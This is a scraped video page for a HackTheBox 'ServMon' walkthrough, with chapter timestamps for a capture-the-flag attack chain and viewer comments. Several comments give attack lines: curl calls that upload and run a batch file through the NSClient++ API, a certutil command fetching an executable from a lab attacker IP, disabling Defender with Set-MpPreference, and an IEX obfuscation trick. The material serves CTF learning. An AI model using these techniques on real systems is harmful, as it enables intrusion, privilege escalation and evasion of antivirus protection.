HackTheBox - ServMon

Рет қаралды 34,561

Күн бұрын

00:00 - Intro
00:50 - Start of NMAP
03:45 - Using SMBClient to search for open shares (None)
04:30 - Checking out the web page, some light fuzzing on login and examining how the language selection works
07:55 - Taking a Screenshot on Parrot and pasting it into Cherry Tree (Shift+PrintScreen)
14:30 - Checking out FTP and downloading the two txt files
16:30 - Viewing port 8443, and realizing this page really hates firefox. Switch to Chromium
19:05 - Using searchsploit to find there's a directory traversal exploit in NVMS
20:05 - Grabbing Passwords.txt off Nathan's Desktop (filename was an FTP Note)
22:50 - Using CrackMapExec to bruteforce logins for SMB and SSH (SSH alread bug fixed in DEV Branch)
26:00 - Logging in with SSH, then looking for WebServer directories
30:20 - Examining the NSClient directory to view the config
33:40 - Using SSH to setup a port forward
35:50 - Lots of flailing around trying to get code execution
44:00 - Enough flailing, box reverted and do a clean run of this exploit
49:00 - Flailing around trying to get Nishang to run... Defender is giving me issues.
59:30 - Giving up with Defender Evasion, switching to nc.exe to get a reverse shell
1:01:20 - Reverse shell returned as System grabbing root.txt

Пікірлер: 97

@jonathanwelch4845 3 жыл бұрын

Long time listener first time caller. Great video Ippsec. Really enjoyed learning from your process and how you trouble shoot your way through. Thanks for sharing!

@ahmadmaulana3622 3 жыл бұрын

Nicely done as usual. What I did was a little bit different. Instead of dealing with thepainintheass web gui, I hit the API from command line. We can even upload the script from the API :)

@ichigok2594 3 жыл бұрын

Thanks for the video. I learn a lot from you.

@SuperDanut 3 жыл бұрын

Great work! Thank you !

@onlyastron4ut 3 жыл бұрын

Couldn't figure out how to root this box.. Thanks for the great insight in your methodology!

@fjank1680 3 жыл бұрын

Nice! Got the user, but was baffled on where to begin privesc on windows, good to see where I messed up. Did not try another browser, so I did not look into that part anymore, and of course hit a brick wall.

@cmdrtotallydead5418 3 жыл бұрын

Hi IPPSEC, just a quick correction in your video. When you was trying to get ntuser.data the file should have been ntuser.dat which is the user registry hive. Once again a good video

@ippsec 3 жыл бұрын

Ah yea. Funny the mistakes made when doing things live and manually :-).. There's definitely some value in scripting out tools to do this stuff.

@zedrobot5864 3 жыл бұрын

thnak u for ur videooooss very helpful

@NimbleSF 4 ай бұрын

That SSH command to start up the port forward without having to escape your SSH is so freakin cool.

@user-yj8jr9gl5x 3 ай бұрын

I did know how to do it, would you tell me ?

@BlackHermit 3 жыл бұрын

Crashing the box is great :D

@mehdiboujid8761 3 жыл бұрын

having someone to rely on whenever u have a problem in these type of things is realy helpfull, too bad i don t have one T-T

@danielmorris5302 3 жыл бұрын

The method to get system on this box was intended to be done through the api. Upload nc to the box first and then create a bat file with the command to execute nc, then--- curl -s -k -u admin -X PUT localhost:8443/api/v1/scripts/ext/scripts/file.bat --data-binary @file.bat curl -k -i -u admin localhost:8443/api/v1/queries/file/commands/execute All done without needing the nsclient password.

@ippsec 3 жыл бұрын

I highly doubt that was the intended route. If so, the box would have been rated Medium by HTB Staff due to the documentation around that API being so bad.

@danielmorris5302 3 жыл бұрын

Hey. Its my box. I'm dmw0ng. There were multiple methods, but the intended was to use the api. I thought it would be easy knowing restarting the nscp service would kill it for everyone. I thought it would be a lesson to all not to just find an exploit and blindly follow.

@ippsec 3 жыл бұрын

@@danielmorris5302 Ah sorry - Had checked the author provided writeup after solving the box and there was no mention of api. Perhaps was an old version.

@danielmorris5302 3 жыл бұрын

@@ippsec I submitted the doc with the method similar to what you described. However, after discussions with staff, it seemed it was not feasible, I then provided additional docs to highlight the preferred method. This box was a carbon copy of what I discovered somewhere during a pentest, I was the only person on the box, and therefore did not have the issues that you get when multiple people are on it. Thats why I submitted original documentation as I did. A shame, because it was as real life as I could get it because of the find. Unfortunately, a badly rated box, but, HTB always produce incredible boxes, so this one will soon be forgot. 🤭. Good job with your patience.

@karanluniyal3516 3 жыл бұрын

@@danielmorris5302 apart from the lil problems in the end man.. This is a very unique and great box.. I learnt a lot. Respect for sharing this box and knowledge with us all..

@elliotalderson957 3 жыл бұрын

35:41 That Laugh made my day

@n30_C0n 3 жыл бұрын

For real! Lol I'm not sure I've ever hear him laugh before

@icon0clast274 3 жыл бұрын

That specific error from defender is AMSI (Anti-malware scan interface) blocking your powershell execution.

@MKVD 3 жыл бұрын

The privesc was so damn annoying because everyone was accidentally crashing the box :D

@noname-yo3zl 3 жыл бұрын

Can someone explain to me, why OWASP says (about directory traversal) that: "In Windows an attacker can navigate only in a partition that locates web root..." and here we can navigate in the whole disk?

@kalidsherefuddin 2 жыл бұрын

Ok thanks

@izaak791 3 жыл бұрын

36:32 "why make it so complicated?" if Ippsec says its complicated then u know u went too far with it.lol btw windows defender is getting stronger everyday...most of the old tricks are all getting blocked recently,almost made me cry once

@mr.fakeman4718 3 жыл бұрын

U r not alone with it.

@elikelik3574 3 жыл бұрын

Hi. I have 2 questions: 1) why after getting shell he did not use winPeas or some tool for privescalation?I mean it would not be it easy to gather information? 2) 59:31 here after getting trouble with New-object, could not he to try download that powershell file with curl or wget? why did he used nc? Thanks in advance.

@TongaRoots 3 жыл бұрын

Did it happen to anybody that the password to log into NSCLIENT++ web interface just didn't work? I tried on Firefox and Chrome after tunneling and I keep getting "403 Your not allowed" even though the password is the same IppSec used which is really frustrating.

@underground635 3 жыл бұрын

Is that the pwnbox or is it you're local setup ??

@mugundhanbalaji 3 жыл бұрын

@ippsec you got command prompt, get-service is ps cmdlet

@LifeInFiveMinutes 6 ай бұрын

Hi Ippsec, I wonder why port forward is needed for the credentials to get accepted? could you please enlighten me?

@mr.fakeman4718 3 жыл бұрын

Every video is one step towards giving up for me. As a learner I have to stop and take a step back. However, I do think that there is a point to ask for suggestions. So, here is my question: How to learn? With HTB, it is hard to pop a box even now. Has the learning process changed or something? I'm clueless...

@TheHectorshark 3 жыл бұрын

It's not about being the best, it's about learning. There is so much to learn about computer sciences and hacking. If you get tired of HTB, search other interesting subjects like reversing or cryptography, they may interest you more because they look new. Also, try other pages. HTB gets boring sometimes. I recomend you cryptohack.org . Don't put too much pressure on you, do it for the thrill of learning what surrounds you.

@mr.fakeman4718 3 жыл бұрын

@@TheHectorshark I understand. Thank you very much for the response! Will leave that here in case somebody has the same issue. You hit me with cryptography bcz I'm a crypto guy. Reversing? Not so much of my bread, but trying harder will work here for me. For popping boxes, well, leaving it for a while seems okay for now. Again, thank you!

@j.stan8916 3 жыл бұрын

With every box you go over you have more knowledge. More knowledge = more chance to do stuff individually. Before running learn to walk kind of thing. I started this in March from literally zero (0) Linux, Networking knowledge with the goal to get my OSCP. On every retired box I go over I take extensive notes and make sure I understand the point of why something is done. It's a very effective studying technique which I can suggest you to follow. Don't be discouraged and expect too much of yourself from the start. Just keep on grinding and it will come in time just as everything in life does.

@happyharry2145 3 жыл бұрын

Just adding this answer for anyone who's just starting like me , HTB is hard for a beginner i would suggest trying tryhackme.com as it walks you through everything and explains it , nonetheless ippsec is a great source for information and i recommend you watch every week's machine and try to do it like him or in a different way through reading the write-ups in HTB forums , Retired boxes are active for free users for 2 weeks after retiring

@TripleHates 3 жыл бұрын

Hey Guys, Does anyone knows where IppSec found is terminal color scheme ? Maybe it is a theme ? I really like it but can't find it ... I am using Gogh atm but there is no color scheme like this :(

@matthewbreeden7258 3 жыл бұрын

I do the windows registry query to pull system version. reg query "hklm\software\microsoft\windows nt\currentversion" /v ProductName and I tend to lean more on the windows cmd for a revers shell if PowerShell fails certutil.exe -urlcache -split -f 10.10.14.2/file.exe file.exe Thank you for all you do ippsec.

@robinhood3841 3 жыл бұрын

Can you explain why you encoded the payload before you send it to powershell ?

@ippsec 3 жыл бұрын

Because it has less chance to fail. New lines, quotes, spaces, etc can cause things to fail when passing commands through the command line. Encoding saves you from that headache

@robinhood3841 3 жыл бұрын

@@ippsec thanks but i mean the little endian encode iconv -t utf-16le before base64 encoding

@leonardotornesello930 3 жыл бұрын

@@robinhood3841 the different encoding is due to the different environment he is interfacing. He's passing data from a Linux system (which uses UTF8) to a Windows environment (Which uses UTF16)

@RajeshKumar-fo9ly 3 жыл бұрын

you are pro i am also trying to become pro like you by your videos 😂😂😂😂😂😂😂😂😂😂😂😂

@renniepak 3 жыл бұрын

You should give FFUF a try instead of gobuster. Best of gobuster and WFUZZ combined.

@ndk9603 3 жыл бұрын

Hello ippsec i hope you read this, You are extremely talented dude why don’t you make a udemy course like a 40 hour course and sell it for 50 dollars something thats good with you, i hope you do it and i will be the first one to buy because your above average in your techniques and everything man. Much respect and i wish you a good day :)

@jt1731 3 жыл бұрын

So what was the reasoning for the switch to Parrot?

@tamaskantor1822 3 жыл бұрын

kzfaq.info/get/bejne/brF6mMWn0sqVdp8.html

@rawkstar952 3 жыл бұрын

how come ../../User/Nathan is 404 but when you put /Desktop/passwords.txt you got 200?? could you please enlighten me?

@ippsec 3 жыл бұрын

Its just because however the webserver is accessing the file errors out on a directory; and the webserver puts 404 whenever there's an error

@dbeeeeee 3 жыл бұрын

Because it was vulnerable to LFI, only files can be viewed not dirs !

@rawkstar952 3 жыл бұрын

@@ippsec thanks! i've been learning a lot from you though it's really hard for me to be qualified in hackthebox. you're one of my inspirations. more power to the channel!

@rawkstar952 3 жыл бұрын

@@dbeeeeee thanks! i should learn LFI

@mayankmehra722 3 жыл бұрын

Why using powershell encoded commands? can't it be worked without encoding?

@Ms.Robot. 3 жыл бұрын

Mmmmmm, better than sex! I would love to see all your tools. Inspiration to dive deeper for root, no matter where the box resides.

@laiyintam6349 3 жыл бұрын

How come this box retire so fast

@DG-qt3qn 2 жыл бұрын

PSA: nc.exe is flagged by AV on this box now. Most walkthroughs don't work anymore. Updated defender I guess.

@wutangdaug 2 жыл бұрын

Well, execute payload is not always the solution. Maybe we can look at creating a new user with admin permission, disable the defender with command.

@josephseed3393 2 жыл бұрын

There's a way around that. Use the powershell Set-MpPreference command to disable active real time monitoring by the AV. This only works if you can execute commands as nt authority, which you can by using the nsclient++ vulnerability

@josephseed3393 2 жыл бұрын

and then u can run any exe without any issues. That's how I rooted the box

@Xx-nd1rs 10 ай бұрын

nc64.exe worked with me

@moonlessiguana1826 9 ай бұрын

@@Xx-nd1rs how this works, I don't understand

@windwest720 3 жыл бұрын

This box is broken

@MukeshSingh-ew7ld 3 жыл бұрын

How do I develop my skills just like you ? Please reply

@farhaaniqbal224 3 жыл бұрын

Ah you just need to buy my very expensive book and comes with a free certificate. Just practice more what. Replay old hackthebox.

@jt1731 3 жыл бұрын

Try harder

@punitchoudhary1490 3 жыл бұрын

please make videos for getting started for beginners 🙂

@KrakoonGaming 3 жыл бұрын

Are you use parrot os as your primary os or u use it on vmware Which is the best option for pentest please tell me

@arwl 3 жыл бұрын

IppSec runs parrot in a vm. As for best option, it comes a lot down to preference. Using distros like Kali or Parrot are nice and easy to start as you've got basically any tool you want pre-installed, but you can use any distro you like as long as it has packages for the tools you want

@buestrm2841 3 жыл бұрын

It was strange that you were able to access nsclient in the beginning without port forwarding...

@Alexarr 3 жыл бұрын

not really, the vpn of hackthebox is made for that

@ippsec 3 жыл бұрын

I think he was trying to access over Firefox which gives random errors and can make it seem closed

@buestrm2841 3 жыл бұрын

@@ippsec Actually when I did this box it was a total mess. Port 8443 was only open internally.

@Reelix 3 жыл бұрын

@@buestrm2841 I had 8443 open, but couldn't access it with a browser, and a raw GET / command through nc on 8443 failed as well.

@devbidesmega1662 3 жыл бұрын

What is Ippsec in IRL name

@alvinsmith8420 2 жыл бұрын

Sep11th, 2021. nc.exe no longer working with windows defender anymore. try XC by xct.

@Marcos15559 3 жыл бұрын

This was good priv escalation but is daam annoying!

@madison9182 3 жыл бұрын

Should we have a license for Burp??

@happyharry2145 3 жыл бұрын

no it has a free version

@Jaiswalkatul 3 жыл бұрын

Because of this mess I missed my chance of getting my first root on live machines.

@thecast6157 3 жыл бұрын

try traceback, it was the first root on any active machine i got

@armandkruger911 2 жыл бұрын

For IEX try; $env:comspec[4,15,25] --join ''

@buestrm2841 3 жыл бұрын

58:36 How did it identify the script as malicious before even requesting it from the web server? 😂

@xXThePr0Xx 3 жыл бұрын

it's not about the script but the IEX command that tries to make a connection to a remote server

@Reelix 3 жыл бұрын

@@xXThePr0Xx The question is how it knew it was malicious even with the IEX removed. It must have been one heck of an over protective anti-virus to assume that powershell doing a WebClient call was malicious o_O